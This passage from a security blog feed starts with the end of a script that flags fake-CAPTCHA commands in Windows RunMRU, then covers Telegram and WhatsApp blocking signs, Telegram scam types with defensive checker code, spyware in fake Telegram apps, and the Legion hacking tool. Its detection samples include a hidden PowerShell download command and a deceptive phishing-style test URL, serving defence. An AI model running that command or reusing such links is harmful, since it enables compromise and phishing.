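# The pasted command is an illustrative one-liner, not the campaign's actual string.
SAMPLE_VALUES = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://openline[.]cyou/x.zip -OutFile $env:TEMP\\x.zip"\\1',
    "c": "cmd\\1",
}
SAMPLE_MRULIST = "bca"

if __name__ == "__main__":
    import sys
    if sys.platform == "win32":
        values, mrulist = read_runmru_live()
    else:
        values, mrulist = SAMPLE_VALUES, SAMPLE_MRULIST
    for f in triage(values, mrulist):
        print(f"#{f['recency']} {', '.join(f['indicators'])}: {f['command']}")
```

A URL on its own is normal in RunMRU (people do paste links there); it is the combination of an interpreter, a downloader and an evasion switch in one entry that marks the fake-CAPTCHA pattern. Clearing the value does not undo anything, so a hit here means the host needs a full triage for whatever the command fetched.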

You’ve Been Blocked in Messaging Apps
https://gridinsoft.com/blogs/youve-been-blocked-in-messaging-apps/
Gridinsoft Blog, Thu, 23 Jan 2025

Ways to Check if a Contact Has Blocked You on WhatsApp and Telegram

People in online conversations often cut off contact not with a loud “door slam,” but quietly by blocking. At the same time, messaging apps never notify you that you’ve been added to someone’s blacklist. Instead, there are indirect signs that can let you know you’re blocked. In this article, we’ll explain how to recognize if someone has blocked you in Telegram and WhatsApp.

How User Blocking Works in Messaging Apps

Blocking a user in a messaging app prevents the blocked person from:

  • sending messages to the contact who blocked them (the messages will not be delivered);
  • seeing profile information (photo, online status, etc.);
  • making voice calls;
  • adding the blocker to group chats.

If you’re having trouble communicating in a messenger, it’s possible you’ve been blocked. However, each messenger guarantees user privacy and confidentiality. From the outside, privacy settings and contact blocking can sometimes look similar.

If you only notice one suspicious sign, it doesn’t mean anything definitive. You’ll need at least three signs before you can be sure you’ve been blocked.

Simply put, blocking in messaging apps works like a glass jar. Its barrier is invisible, but you can feel it:

  • You can see the profile of the person who blocked you and read the chat history (the contact remains in your list);
  • But you can’t “reach” them (your messages won’t go through);
  • The other person doesn’t “hear” you (they don’t receive your messages);
  • This “jar” is completely airtight (there’s no way around the block);
  • The other person can remove this transparent barrier at any time (by unblocking you).

Reasons for blocking can be anything from differences of opinion to so-called “ghosting.” Ghosting is when someone abruptly stops communicating without explanation and ignores all attempts to get in touch.

After you’ve been unblocked, the recipient won’t see any messages you sent while you were blocked. However, from the unblocked user’s perspective, those previously sent messages will appear as delivered.

Key Signs of Being Blocked in Messengers

You, as usual, see the chat with your conversation and can write a message, but you feel that something is not quite right.

You should not expect a pop-up or for the messenger itself to notify you about the block. If you suspect that you have been blocked, check the signs listed below.

1. Checking the Message Status

Confusion regarding the message status is one of the clear signs of being blocked.

The popularity of messengers depends on how convenient they are for users, and this makes their functionality somewhat similar.

For ease of communication, messengers have status checkmarks in the lower-right corner of a message. The only difference is in the color of the checkmark (green for Telegram, blue for WhatsApp) and small nuances specific to each messenger.

For Telegram:

  • One checkmark — the message has been delivered but not yet read.
  • Two checkmarks — the message has been read by the recipient.

Telegram message has been delivered but not yet read.

In WhatsApp:

  • One gray checkmark — the message has been sent to the recipient.
  • Two gray checkmarks — the message has been delivered, but the recipient has not opened the chat yet.
  • Two blue checkmarks — the message has been read.

WhatsApp Check Marks

Two gray checkmarks in WhatsApp can be ambiguous. If the person has disabled read receipts, then none of their contacts will see blue checkmarks, even if the messages were read.

If your contact has blocked you in the messenger, your message will not be received — you will only see one gray checkmark.

There will also be no second checkmark if the recipient’s phone is turned off, they have deleted the messenger app, there are issues with internet access, or the recipient has not yet had a chance to read your message.

2. Access to Profile Information

An “empty” profile is the second important sign. If you have been blocked, the messenger will hide from you:

  • the profile picture of the person who blocked you;
  • their online presence;
  • the time of their last visit.

After a block, Telegram hides the contact’s photo and changes their status to “Was online a long time ago.” In WhatsApp, the indication of the last seen time and/or the online status simply disappears.

The privacy settings of many messengers allow you to hide profile information. A user can hide their profile picture through privacy settings or simply use one standard “placeholder” instead of an avatar.

WhatsApp usually shows the exact time when the user was last online or removes this status entirely. If you have hidden your own last seen time in the settings, you will not be able to see others’ as well.

Depending on privacy settings, Telegram either shows the exact time or an approximate status (“Recently“). After a block, this status changes to “A long time ago.” It’s typically assigned to deleted or inactive accounts. If this status appeared literally yesterday, it’s a clear sign you’ve been blocked.

By default, Telegram shows when a contact is online. If a user has completely hidden their online presence in the settings, the status indicator will appear when they start typing a message to you.

If you have mutual acquaintances, ask them how they see your contact’s profile and status. The person might have simply deleted their profile photo and hidden their online status. If everyone sees the same blank placeholder in the profile and can’t say when the person was last online, then everything is fine, and we should respect their privacy.

3. Adding to Groups

The inability to invite someone to a group is one of the most telling signs of being blocked. Try adding the contact to a new group. If you have been blocked, a notification will pop up saying that you can’t perform this action.

If you were both in the same group chats before you were blocked, you’ll still be able to see their messages there, but you won’t be able to send them a private message.

It’s important to respect personal boundaries. While testing to see if you can interact with someone’s account is effective, a person who suddenly finds themselves added to a random group may be surprised and have questions.

If you can’t add someone to a group, this by itself (without any other signs) doesn’t necessarily mean you’ve been blocked. The user might have disabled the option for others to add them to chats.

4. Checking the Connection

Try calling through the app. If you’ve been blocked, it won’t work.

The difference is that in Telegram, the call is dropped immediately. In WhatsApp, it will feel like it’s ringing endlessly without connecting.

If the recipient isn’t online or their phone is turned off, the call will also be dropped immediately. Or the other person may have disabled voice calls in their privacy settings.

5. Reaching Out

Usually, when people cut off contact, they cut it off everywhere. The last check is to find the recipient on social networks or through another messenger to see if you’ve been blocked there as well.

Because blocking a contact doesn’t remove the phone number from the address book, you can still try to reach out to the person directly.

If it’s appropriate and your relationship allows it, you can ask the person who blocked you what happened. Perhaps it’s simply a misunderstanding or a reaction made in the heat of the moment—like after a heated discussion.

By the end of your check, you’ll understand the reason for undelivered messages: a block, an issue with the messenger’s server, or the recipient’s busy schedule. It might be that they don’t hold a grudge; they just didn’t have time to respond.

Checklist of Signs You’ve Been Blocked in a Messenger

  • Only one checkmark in the lower right corner of your messages;
  • You are the only one among mutual acquaintances who doesn’t see the blocker’s profile photo;
  • No information about the user’s last online time is shown;
  • Your messages remain unread for a very long time;
  • You can’t add the contact to a group or chat;
  • You can’t reach the contact by messenger call;
  • The recipient has blocked you not only in the messenger but also on social networks.

If you want to protect yourself from more than just being blocked, it’s also important to stay aware of common scams on messaging apps. Check out our article on Dangerous WhatsApp Scams You Should Avoid to learn about the latest fraud schemes, and be sure to read about the Ross Ulbricht Telegram Captcha Scams, so you can recognize and avoid new tactics used by cybercriminals.

The post You’ve Been Blocked in Messaging Apps appeared first on Gridinsoft Blog.

Top 11 Telegram Scams in 2025: Complete Protection Guide https://gridinsoft.com/blogs/top-11-latest-telegram-scams/ Fri, 10 Jan 2025 05:59:02 +0000
With more than 800 million active users, Telegram has become one of the world’s most popular messaging platforms. Unfortunately, its popularity and enhanced security features have also made it a prime target for scammers and cybercriminals. This comprehensive guide explores the most dangerous Telegram scams of 2025, how to identify them, and the steps you can take to protect your personal information and financial assets.

What are Telegram Scams?

Telegram scams are deceptive schemes that operate within the Telegram messaging platform or use it as a gateway to lure victims to malicious third-party sites. Scammers are attracted to Telegram because of its massive user base, minimal signup requirements (only a phone number is needed), and features like anonymous messaging and bot capabilities.

According to cybersecurity reports, Telegram-based scams increased by 43% in 2024, with financial losses exceeding $200 million globally. These scams range from traditional phishing attempts to highly sophisticated bot-powered operations masquerading as legitimate customer service or investment opportunities.

The most common Telegram scam methods include:

  • Phishing attacks – Scammers pose as trusted contacts or support agents to trick victims into revealing sensitive personal information
  • Off-platform fraud – Directing users away from Telegram to malicious websites that steal information or distribute malware
  • Bot-powered scams – Using automated Telegram bots to target vulnerable users at scale (in 2020, Telegram blocked approximately 350,000 bot accounts for fraudulent activities)
  • Cryptocurrency fraud – Targeting crypto enthusiasts with fake investment opportunities, exchange platforms, or wallet access schemes

As Telegram continues to grow in popularity, scammers develop increasingly sophisticated methods to exploit unsuspecting users. Recent research by Intel 471 identified dangerous malware like the X-Files bot that can steal passwords, session cookies, login credentials, and even credit card details from Telegram users. Let’s examine the top 11 Telegram scams you need to watch out for in 2025.

1. Fake Telegram Channels and Groups

Telegram channels and groups are community spaces where users with shared interests gather. Unfortunately, scammers frequently create convincing “copycat” versions of popular channels to trap unsuspecting victims.

These imposter channels meticulously mimic legitimate ones, featuring nearly identical:

  • Channel names and profile images
  • Pinned posts and content format
  • Administrator accounts with similar or identical usernames
  • Active “user” discussions (often about cryptocurrency promotions or investment opportunities)
Fake Telegram channels can look nearly identical to legitimate ones (same names, logos and content structure), making them difficult to identify

How to Identify Fake Telegram Channels

Telegram @usernames, and therefore the t.me/ links built from them, are unique, so the one reliable check is to compare the channel’s exact @username with the handle the organization publishes on its official website: a copycat can reproduce the name, logo and pinned posts, but not the handle. Also note whether you can send messages in the chat. If you can’t, it is a “broadcast-only” channel where only administrators post. That isn’t suspicious by itself (many legitimate channels are broadcast-only), but it is worth knowing when you evaluate a channel’s authenticity.

Protection Tips:

  • Report suspicious channels and impostor accounts to Telegram
  • Adjust your privacy settings to prevent anyone from adding you to groups without your permission
  • Verify official channels through the organization’s website or other trusted sources
  • Be wary of channels that pressure you to make financial decisions quickly

2. Telegram Crypto Expert Scams

Telegram has become the preferred platform for cryptocurrency enthusiasts and investors, which unfortunately makes it a prime target for crypto scammers. These criminals pose as cryptocurrency experts or investment advisors, promising guaranteed returns on investments.

The typical approach involves:

  1. Scammers contact potential victims through Telegram, often after seeing them post in legitimate crypto groups
  2. They claim to offer “guaranteed” returns (often 30-50% or more)
  3. They show screenshots or charts of supposed successful trades
  4. They convince victims to open accounts at “special” or “exclusive” crypto exchanges
  5. Initial small investments may show profits to build trust
  6. After larger investments are made, the scammers disappear completely

In one documented case, a victim sent $50 in Bitcoin to a fake exchange and quickly saw a $30 “profit.” Convinced, he encouraged several friends to invest their savings. After his friends transferred significant amounts, the fake broker vanished with all the funds.

How to Spot Crypto Expert Scams

According to FBI estimates, approximately 25,000 people fell victim to cryptocurrency fraud last year, with losses approaching $1 billion. The promise of “guaranteed” returns or access to “special” exchanges are reliable indicators of cryptocurrency investment fraud on Telegram.

Protection Tips:

  • Ignore anyone who claims to guarantee investment returns, especially with cryptocurrencies
  • Avoid “special” or “exclusive” cryptocurrency exchanges that aren’t widely known
  • Never send money or cryptocurrency to someone you’ve only communicated with on messaging platforms
  • Research all investment opportunities thoroughly before committing any funds

3. Phishing with Telegram Bots

Telegram’s open platform lets anyone create and deploy bots, which scammers exploit for phishing at scale. These bots run scripted dialogues, sometimes padded with AI-generated text, that can be hard to distinguish from a real customer support agent.

In one notable scheme, criminals used the SMSRanger bot to impersonate representatives of banks, Apple Pay, Google Pay, and PayPal: the bot calls the victim with a recorded “security alert” and asks them to key in the one-time code they have just received, which is then relayed to the attacker to complete a fraudulent login or payment. Security forums report success rates of about 80% once a victim answers the call. Alarmingly, such bot services rent for as little as $300 per month, putting them within reach of many would-be scammers.

A particularly dangerous bot called X-Files has been identified by Intel 471 researchers. This malware can steal passwords, session cookies, login credentials, and credit card details from unsuspecting Telegram users, creating significant security risks.

Telegram bots advertised for fraudulent purposes, such as fake earning opportunities, can be found throughout the platform

How to Identify Bot-Powered Phishing

Telegram bot scams display the classic signs of phishing attacks:

  • Creating a false sense of urgency
  • Communications from unusual or suspicious phone numbers
  • Grammatical errors and awkward phrasing
  • Requests for sensitive information like passwords or account numbers
  • Pressure to take immediate action

Protection Tips:

If you receive a call from someone claiming to represent your bank or another financial institution, hang up and call the organization directly using their official phone number. Remember that scammers can spoof caller IDs to make their calls appear legitimate.

Banks and payment providers do not initiate account verification or discuss your finances through Telegram or other third-party messaging apps. Even companies that run an official Telegram presence will never ask for passwords, card numbers or one-time codes there; treat any such request as phishing and verify through the official website or app.

4. Telegram Tech Support Scams

Tech support scams on Telegram involve fake accounts that impersonate legitimate customer service representatives. These scammers use sophisticated bots to monitor groups and channels for specific keywords, then contact potential victims claiming to offer technical assistance.

During these interactions, scammers typically:

  • Request sensitive account information under the guise of verification
  • Charge fees for “premium” support services
  • Request remote access to your device to “fix” issues
  • Pressure you to make payments to “upgrade” or “verify” your account

How to Identify Tech Support Scams

If you’re experiencing issues with a service or platform, always initiate contact through official channels rather than responding to unsolicited support offers. Be especially cautious of accounts that contact you first with support offers or those that charge for assistance that should be provided for free.

Protection Tips:

  • Check the account’s @username, not just its display name (anyone can set a display name such as “Binance Support”), and compare it with the handle published on the company’s official website
  • Report suspicious accounts to both Telegram and the company being impersonated
  • Never pay for support services unless you’re absolutely certain they’re legitimate
  • Contact companies directly through their official websites when you need support

5. Cryptocurrency Giveaway Scams

Fake giveaways are among the oldest scam tactics, now adapted for Telegram and cryptocurrency. In these schemes, bots or users claim to offer prizes from well-known companies (such as Amazon, Apple, or cryptocurrency exchanges like Binance or Coinbase).

To claim the supposed prize, victims must typically:

  • Provide banking details and personal information
  • Pay a “processing fee” or “verification deposit”
  • Submit cryptocurrency wallet credentials
  • Complete “verification” processes that steal personal data
Fake Binance giveaway on Telegram: the classic “pay a small fee to claim a large prize” scam adapted for cryptocurrency platforms

How to Identify Cryptocurrency Giveaway Scams

While legitimate companies occasionally run promotions and giveaways, unsolicited offers of free cryptocurrency or prizes you never entered to win are almost certainly fraudulent. If you’re unsure about a promotion, contact the company directly through their official website to verify its legitimacy.

Protection Tips:

  • Never pay fees to claim prizes, especially through cryptocurrency or payment apps like Zelle, Venmo, or Cash App
  • Block and report accounts offering unsolicited prizes or giveaways
  • Remember that legitimate giveaways never require payment to participate or claim prizes
  • Verify any promotion through the company’s official website or social media accounts

6. Fake Admin Accounts

While Telegram usernames must be unique, scammers create accounts with names that closely resemble official administrators or support staff. These accounts often contact users after they post questions in public groups, offering to “help” resolve issues.

Their actual goals typically include:

  • Gaining access to your account through verification codes or passwords
  • Directing you to phishing sites that mimic legitimate login pages
  • Collecting personal information under the pretense of account verification
  • Installing malware on your device through deceptive downloads

How to Identify Fake Admin Accounts

Pay close attention to account names, looking for subtle misspellings or letter substitutions. For example, “TichSupport” instead of “TechSupport,” or “BitgetToken” instead of “bitgetEN.” Sometimes the account has no @username at all, only a display name, which should itself raise suspicion for anyone claiming to be staff. Be particularly cautious of users who initiate private messages rather than responding publicly in the group.

Protection Tips:

  • Never share personal information or passwords in direct messages
  • Search the group for previous messages from users who contact you privately — if none exist, they’re likely imposters
  • Report fraudulent accounts to both Telegram and the company being impersonated
  • Remember that legitimate administrators typically respond in public channels first
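The username check above can be automated. The following is an added example, not code from the original post: it normalizes a display name or @username (NFKC, lower-case, a small table of look-alike characters such as Cyrillic “о” for Latin “o”) and compares it with a list of trusted handles by exact match, by brand word, and by edit distance. The trusted handles and brand words are constructed sample values, not real accounts; since Telegram @usernames may only contain a-z, 0-9 and underscore, the confusable mapping mostly matters for display names.

```python
import unicodedata

# Trusted @usernames as published on the organisations' official sites.
# Constructed sample values for this example, not real accounts.
TRUSTED_USERNAMES = {"techsupport", "bitgeten", "binance_support"}

# Brand words that an impostor is likely to embed in a look-alike name.
BRAND_WORDS = {"bitget", "binance", "telegram"}

# Characters that look like ASCII letters/digits in a display name.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic а
    "\u0435": "e",  # Cyrillic е
    "\u043e": "o",  # Cyrillic о
    "\u0440": "p",  # Cyrillic р
    "\u0441": "c",  # Cyrillic с
    "\u0445": "x",  # Cyrillic х
    "\u0443": "y",  # Cyrillic у
    "\u0456": "i",  # Ukrainian і
    "0": "o", "1": "l", "3": "e", "5": "s", "|": "l",
}


def normalize(name: str) -> str:
    """Strip '@', apply NFKC, lower-case and map confusable characters."""
    name = unicodedata.normalize("NFKC", name.strip().lstrip("@")).lower()
    return "".join(CONFUSABLES.get(ch, ch) for ch in name)


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (classic dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(name: str, trusted=TRUSTED_USERNAMES, max_distance: int = 2) -> str:
    """
    Classify an account name against the trusted list:
      'trusted'   - exact match to a trusted @username
      'lookalike' - equals a trusted name after confusable mapping, embeds a
                    brand word, or is within a few edits of a trusted name
      'unknown'   - not close to anything trusted
    """
    raw = name.strip().lstrip("@").lower()
    if raw in trusted:
        return "trusted"
    norm = normalize(name)
    for t in trusted:
        if norm == t:  # identical after homoglyph mapping
            return "lookalike"
    if any(brand in norm for brand in BRAND_WORDS):
        return "lookalike"
    for t in trusted:
        # Only score names long enough that a small distance is not coincidence.
        if len(t) >= 6 and levenshtein(norm, t) <= max_distance:
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    for candidate in ["@TechSupport", "TichSupport", "BitgetToken",
                      "techsupp\u043ert", "random_person_42"]:
        print(f"{candidate!r}: {classify(candidate)}")
```

A “lookalike” verdict is a reason to stop and check the group’s history for that account (the tip above), not a final judgement; tune `max_distance` and the brand list to the communities you actually use.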

7. Classiscam: Fake Classified AD Scams

The “Classiscam” scheme is a sophisticated Telegram-based fraud operation that has netted criminals over $6.5 million from victims. These scams involve creating fake listings for popular consumer electronics on classified ad sites, then directing interested buyers to continue the transaction via Telegram.

The complete scam typically operates as follows:

  1. Scammers create attractive listings for products like laptops, cameras, or iOS devices on popular marketplace sites
  2. The listing directs potential buyers to Telegram for “faster communication”
  3. On Telegram, the victim connects with a bot designed to steal personal information
  4. Alternatively, the scammer sends a link to a fake marketplace page that mimics legitimate sites like Facebook Marketplace or Craigslist
  5. To “complete” the purchase, victims are asked for their address, credit card details, and other personal information

How to Identify Classiscam Operations

Watch for red flags in online marketplace listings, such as suspiciously low prices and sellers who insist on communicating through Telegram rather than the platform’s built-in messaging system. If you are sent to an external website, check for design inconsistencies, spelling or grammar errors, and plain “http://” URLs. Do not treat “https://” as proof of legitimacy, though: scam sites obtain certificates just as easily, so what matters is whether the domain is actually the marketplace’s own (for example, facebook.com) rather than a lookalike that merely contains the brand name somewhere in the address.

Protection Tips:

  • Always inspect items in person before purchasing when possible
  • Use secure payment platforms that offer buyer protection, such as PayPal or credit cards
  • Never continue marketplace transactions on Telegram or other messaging platforms
  • Be skeptical of deals that seem too good to be true
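The domain check described above, written out as an added example (not code from the original post): it takes the link a “seller” sends, flags a non-HTTPS scheme, a raw IP address, user-info before the host, deeply nested subdomains, and a brand name that appears in the address while the registrable domain is not the official one. The official-domain and brand-word lists are sample values, and the registrable domain is taken as the last two labels of the hostname, an assumption that is good enough for .com/.org but not for suffixes like .co.uk (use the Public Suffix List in real tooling).

```python
from urllib.parse import urlsplit

# Official registrable domains of the marketplaces Classiscam pages imitate.
# Sample list for this example; extend it with the sites you actually use.
OFFICIAL_DOMAINS = {"facebook.com", "craigslist.org", "paypal.com"}
BRAND_WORDS = sorted({"facebook", "craigslist", "paypal", "marketplace"})


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname (assumes a two-label registrable domain,
    e.g. example.com; a real deployment should use the Public Suffix List)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_marketplace_url(url: str) -> list:
    """Return a list of red-flag strings for a link received from a seller.
    An empty list means nothing obviously wrong was found, not that it is safe."""
    flags = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        flags.append("not https")
    if not host:
        flags.append("no hostname")
        return flags
    if host.replace(".", "").isdigit():
        flags.append("raw IP address instead of a domain")
        return flags
    domain = registrable_domain(host)
    if domain not in OFFICIAL_DOMAINS:
        # A brand name anywhere in the address while the registrable domain is
        # not the official one is the "facebook-marketplace-secure.example" pattern.
        haystack = parts.netloc.lower() + parts.path.lower()
        for brand in BRAND_WORDS:
            if brand in haystack:
                flags.append(f"brand '{brand}' used on non-official domain {domain}")
                break
        if "@" in parts.netloc:
            flags.append("userinfo in URL (hides the real host)")
        if host.count(".") >= 3:
            flags.append("deeply nested subdomains")
    return flags


if __name__ == "__main__":
    for link in [
        "https://www.facebook.com/marketplace/item/123",
        "http://facebook-marketplace-secure-pay.example/checkout",
        "https://www.paypal.com.secure-checkout.example.net/login",
        "https://paypal.com@evil.example/",
    ]:
        print(link, "->", check_marketplace_url(link) or ["no obvious red flags"])
```

The function deliberately stops at “obvious red flags”: a clean result for a domain you have never heard of still means you should leave the deal on the marketplace’s own site and its own payment flow.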

8. “Pump And Dump” in Telegram Crypto Channels

“Pump and dump” schemes involve artificially inflating the price of an asset (usually a cryptocurrency with a small market cap) through coordinated buying, then selling it at the inflated price before it crashes. On Telegram, these schemes operate through dedicated channels where administrators claim to have “insider knowledge” about upcoming price movements.

These scams often take the following structure:

  • Channel administrators acquire a position in a little-known cryptocurrency
  • They promote the cryptocurrency to channel members, creating artificial buying pressure
  • As prices rise due to coordinated buying, the administrators sell their holdings
  • The price subsequently collapses, leaving regular investors with significant losses
  • Many channels charge “VIP membership” fees, creating a double revenue stream for scammers
Many “pump and dump” groups sell premium subscriptions for “early access” to trading signals

How to Identify Pump and Dump Schemes

These fraudulent Telegram channels often describe themselves as “signal groups” and create a sense of urgency to pressure members into acting quickly. They typically emphasize the fear of missing out (FOMO) on supposedly lucrative opportunities and make grandiose claims about potential returns.

Protection Tips:

  • Be skeptical of investment advice that creates artificial time pressure
  • Research the track record of any investment group before participating
  • Avoid cryptocurrencies with very low market capitalization and trading volume
  • Remember that coordinated price manipulation schemes are illegal in most jurisdictions

9. Fake Job Offers on Telegram

Job scams have proliferated across professional networking platforms, with many now incorporating Telegram as part of their operation. Scammers post attractive job listings with appealing salaries and flexible working conditions, requiring only that interested applicants contact a “hiring manager” through Telegram.

Once in contact with the supposed hiring manager, victims may be asked to:

  • Provide sensitive personal information like Social Security numbers or banking details
  • Pay for training materials, software, or equipment
  • Complete “test projects” that actually constitute unpaid work
  • Cash fraudulent checks and return portions of the funds

How to Identify Fake Job Scams

Most fake job scams follow a similar pattern: the terms are too good to be true, the interview process is unusually brief or informal, and communication shifts quickly to Telegram. While legitimate employers might request personal information like Social Security numbers, this typically occurs after a formal offer and through secure, official channels—not via messaging apps.

Protection Tips:

Watch for common indicators that a job offer is fraudulent, such as abbreviated interview processes, immediate job offers, or requests for payment. Never provide sensitive personal information until you’ve verified the legitimacy of the employer and received an official employment contract.

10. “Friend in Need” Scams

In “friend in need” scams, criminals gather information about your contacts from social media or data breaches, then impersonate these individuals on Telegram to request emergency financial assistance. They might claim to be in dire circumstances, such as being stranded while traveling, involved in an accident, or facing unexpected medical bills.

How to Identify “Friend in Need” Scams

Pay attention to the language and communication style. Does it match how your friend typically communicates? Are there unusual phrases or grammatical structures that seem out of character? Additionally, consider the urgency of the request—would your friend typically ask for financial help without providing context or through a messaging platform rather than a phone call?

Protection Tips:

  • Verify the request by contacting your friend through another communication channel
  • Ask personal questions that only the real person would know (and that aren’t available on social media)
  • If you confirm it’s a scammer, block the account and alert the real person about the impersonation
  • Inform mutual friends about the scam to prevent them from becoming targets

11. Telegram Romance Scams

Romance scams involve criminals establishing romantic relationships with victims to exploit their emotions for financial gain. On Telegram, these scams often focus on developing quick emotional connections and requesting financial assistance or explicit content that can later be used for blackmail.

Common scenarios include:

  • Scammers claiming they need money for emergencies, travel expenses, or visa applications to visit the victim
  • Requests for gift cards or digital payments to overcome supposed obstacles
  • Soliciting compromising photos or videos, which are then used for blackmail
  • Creating elaborate backstories about being wealthy but temporarily unable to access funds

One Reddit user described an interaction with a scammer on Telegram who claimed she couldn’t meet because she was babysitting and requested a Steam gift card to keep the children occupied. Gift cards are particularly popular in scams because they function as untraceable currency.

How to Identify Romance Scams

Romance scammers typically avoid in-person meetings and video calls, providing various excuses for why they can’t connect face-to-face. They often attempt to escalate emotional intimacy rapidly, sometimes sending intimate photos (usually stolen from other accounts) to encourage reciprocation. The most telling sign is when they begin requesting money or financial assistance.

Protection Tips:

  • Never send money to someone you’ve only met online, regardless of their story
  • Be cautious about sharing personal information, even seemingly innocent details about your family or work
  • Insist on video calls before developing serious emotional connections
  • Perform reverse image searches on profile pictures to check if they’ve been stolen from elsewhere

Complete Telegram Scam Prevention Guide

Protecting yourself from Telegram scams requires vigilance and proper security practices. Here are comprehensive strategies to safeguard your information and finances:

Optimize Your Telegram Security Settings

  • Enable two-step verification – Telegram’s Two-Step Verification adds a cloud password that is required, on top of the SMS or in-app login code, whenever your account is signed in on a new device; it is the setting that stops a stolen login code from being enough to take over the account
  • Configure privacy settings – Limit who can see your phone number, add you to groups, or call you
  • Set up passcode lock – Add a PIN or biometric authentication for opening the app
  • Review active sessions – Settings → Devices (Active Sessions) lists every device signed in to your account; terminate any you don’t recognize. Telegram also sends a service message from its official account when a new login occurs
  • Create a strong password – Use a unique, complex two-step verification password combining uppercase and lowercase letters, numbers, and symbols
  • Use a password manager – Generate and store that password, and your other unique passwords, in a password manager
Recommended Telegram privacy settings configuration

General Security Practices

  • Verify before trusting – Never trust unsolicited messages, even if they appear to come from friends
  • Use secret chats – For sensitive one-to-one conversations, use Telegram’s end-to-end encrypted secret chats; regular cloud chats and all groups are encrypted only between you and Telegram’s servers, not end to end
  • Keep your app updated – Always install the latest Telegram updates to benefit from security improvements
  • Be skeptical of links – Avoid clicking links from unknown sources or those that seem suspicious
  • Never share verification codes – Neither Telegram itself nor any legitimate organization will ask for your Telegram login code; anyone who does is trying to take over your account
  • Maintain current contact information – Keep your phone number up to date to facilitate account recovery
  • Report suspicious activity – Use Telegram’s reporting features to flag scammers and fraudulent groups
  • Check usernames carefully – Verify the exact spelling of usernames, as scammers often use similar-looking characters

By implementing these security measures and staying informed about the latest scam tactics, you can enjoy Telegram’s communication benefits while minimizing your risk of falling victim to fraud. Remember that new scam methods emerge regularly, so maintaining a healthy skepticism toward unsolicited contacts and offers is your best defense.

The post Top 11 Telegram Scams in 2025: Complete Protection Guide appeared first on Gridinsoft Blog.

Spyware in Fake Telegram Apps Infected Over 10 million Users https://gridinsoft.com/blogs/fake-telegram-apps-spyware/ Tue, 12 Sep 2023 14:12:15 +0000
It is important to exercise caution when using messenger mods. Spyware disguised as modified versions of Telegram has been found on the Google Play Store, built to extract sensitive information from compromised Android devices. Despite such cases, many users still blindly trust any app published on Google Play. We have repeatedly warned that a Google Play listing is no guarantee of safety: it can still deliver a Trojan, a backdoor, a malicious subscriber, or other harmful software.

Trojanized Telegram Clients Spread on Google Play

Telegram’s Play Store build uses the package name org.telegram.messenger, while the APK downloaded directly from Telegram’s website uses org.telegram.messenger.web. The threat actors published their fakes under similar-looking package names ending in “wab,” “wcb,” and “wob” to trick users into installing them. Although they looked like the genuine Telegram app with a localized interface, the infected builds contained an additional module that Google Play moderators missed. A few days ago, experts revealed that a malware campaign called BadBazaar was using similar rogue Telegram clients to gather chat backups.

Examples of fake Telegram apps:

Security experts have recently discovered a number of malicious apps on Google Play that claim to be versions of Telegram in Uyghur, Simplified Chinese, and Traditional Chinese languages. These apps have descriptions written in their respective languages and contain images that are very similar to the official Telegram page on Google Play, making it difficult to distinguish them from the genuine app.

The devs of these fake apps promote them as a faster version of a regular client, citing a distributed network of data centers worldwide. They use this as bait to persuade users to download the mods instead of the official Telegram app.

Simplified Chinese, Traditional Chinese, and Uyghur versions of Telegram on Google Play with spyware inside

How dangerous are fake Telegram apps?

Millions of users have downloaded apps that were found to have malicious features. Among other things, malicious copies have functionality to capture and transmit sensitive information such as names, user IDs, contacts, phone numbers and chat messages to a server controlled by an unknown actor. Experts who discovered this activity have codenamed it Evil Telegram. Google has since taken down these apps from its platform.

Nonetheless, the poor app moderation problem in Google Play has persisted for almost a decade. You can upload practically anything, even malware, and it may be deleted only after numerous reports flag it as malicious. And there is still no guarantee that the reports will be processed in a reasonable time; some rogue apps remain on Google Play for months. For that reason, the threat will most probably resurface, especially given Telegram’s growing popularity.

How to stay safe?

Here are some important tips to keep yourself safe from infected versions of popular messaging apps and other threats that target Android users:

  • As I’ve just said, Google Play isn’t completely immune to malware. It is still a much safer option than third-party sources, though, so always download and install apps from official stores.
  • Before installing any app, even from an official store, take a closer look at its page and make sure it is legitimate. Pay attention to the app’s name, developer and package name: cybercriminals frequently rely on typosquatting or spoofing to spread their malware.
  • Reading negative user reviews is a good way to identify potential issues with an app. If there’s a problem with an app, someone has likely already written about it. Also search for reviews on the web; there are plenty of sites where users can leave feedback without any censorship from the developer or Google, and using several independent sources gives a clearer picture.

The post Spyware in Fake Telegram Apps Infected Over 10 million Users appeared first on Gridinsoft Blog.

Legion Hacker Tool Used to Steal Data from Poorly Protected Websites https://gridinsoft.com/blogs/legion-hacker-tool/ Wed, 19 Apr 2023 09:37:11 +0000
Experts have discovered a Python-based Legion hacking tool that is sold via Telegram and is used as a way to hack into various online services for further exploitation.

Let me remind you that we also wrote that Microsoft Told How To Detect The Installation Of The BlackLotus UEFI Bootkit, and also that Experts discovered ESPecter UEFI bootkit used for espionage.

Attacks with Legion Hacker Tool

According to Cado Labs researchers, the Legion malware has modules for enumerating vulnerable SMTP servers, conducting remote code execution (RCE) attacks, exploiting unpatched versions of Apache, brute-forcing cPanel and WebHost Manager (WHM) accounts, as well as interacting with the Shodan API and abusing AWS services.

The researchers say the malware shares similarities with another malware family, AndroxGh0st, which was first discovered by cloud security provider Lacework in December 2022.

Last month, SentinelOne published an analysis of AndroxGh0st, which showed that the malware is part of the AlienFox toolkit, which is offered to criminals to steal API keys and secrets from cloud services.

“Legion appears to be part of a new generation of cloud credential harvesting and spam utilities. The developers of these tools often steal code from each other, making attribution difficult,” the experts write.

In addition to using Telegram to extract data, Legion is designed to hack web servers running a CMS, PHP, or PHP-based frameworks such as Laravel.

“It is capable of obtaining credentials for a wide range of web services such as email providers, cloud providers, server management systems, databases, and payment platforms, including Stripe and PayPal,” says the Cado Labs report.

